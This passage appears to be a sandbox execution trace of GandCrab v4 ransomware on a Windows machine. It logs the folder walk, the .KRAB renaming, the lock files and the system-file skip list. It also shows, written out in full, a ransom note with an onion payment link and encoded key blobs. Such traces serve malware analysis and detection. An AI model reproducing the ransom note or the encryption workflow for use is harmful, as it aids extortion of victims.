JGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.804] WriteFile (in: hFile=0x450, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.805] CloseHandle (hObject=0x450) returned 1 [0059.805] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.806] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.806] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x8)) [0059.806] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.806] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.806] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.807] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a08d2ca4dee3d.lock") returned 135 [0059.807] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x450 [0059.809] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.809] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 112 [0059.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0059.809] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xfbd6e0 [0059.809] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.809] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0059.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.810] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0059.810] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.810] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.810] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a08d2ca4dee3d.lock" [0059.810] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.810] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 140 [0059.810] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\d2ca4a08d2ca4dee3d.lock") returned 135 [0059.810] lstrlenW (lpString=".lock") returned 5 [0059.810] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.810] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.811] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.811] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.811] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0059.811] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.811] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.811] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\KRAB-DECRYPT.txt" [0059.811] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.811] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\KRAB-DECRYPT.txt.KRAB") returned 133 [0059.812] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\KRAB-DECRYPT.txt") returned 128 [0059.812] lstrlenW (lpString=".txt") returned 4 [0059.812] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.812] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.812] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.812] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\KRAB-DECRYPT.txt") returned 128 [0059.812] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\KRAB-DECRYPT.txt") returned 128 [0059.812] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.812] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.812] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.812] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.812] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.813] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.813] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0059.813] FindClose (in: hFindFile=0xfbd6e0 | out: hFindFile=0xfbd6e0) returned 1 [0059.814] CloseHandle (hObject=0x450) returned 1 [0059.825] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.825] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.825] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.825] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\KRAB-DECRYPT.txt" [0059.826] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.826] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\KRAB-DECRYPT.txt.KRAB") returned 112 [0059.826] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\KRAB-DECRYPT.txt") returned 107 [0059.826] lstrlenW (lpString=".txt") returned 4 [0059.826] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.826] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.827] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.827] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\KRAB-DECRYPT.txt") returned 107 [0059.827] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\KRAB-DECRYPT.txt") returned 107 [0059.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.829] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.829] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.829] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.829] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.829] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.829] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.829] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.829] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.829] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0059.829] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0059.829] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0059.829] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0059.829] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.926] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.926] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.926] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.926] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.926] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.926] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.926] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\KRAB-DECRYPT.txt") returned 116 [0060.021] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0060.110] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.110] WriteFile (in: hFile=0x450, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.111] CloseHandle (hObject=0x450) returned 1 [0060.114] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.114] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.115] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x141)) [0060.115] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.115] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.115] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.115] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a08d2ca4dee3d.lock") returned 122 [0060.115] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x450 [0060.121] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.122] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.122] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 99 [0060.122] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0060.122] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xfbd1e0 [0060.122] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.122] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: 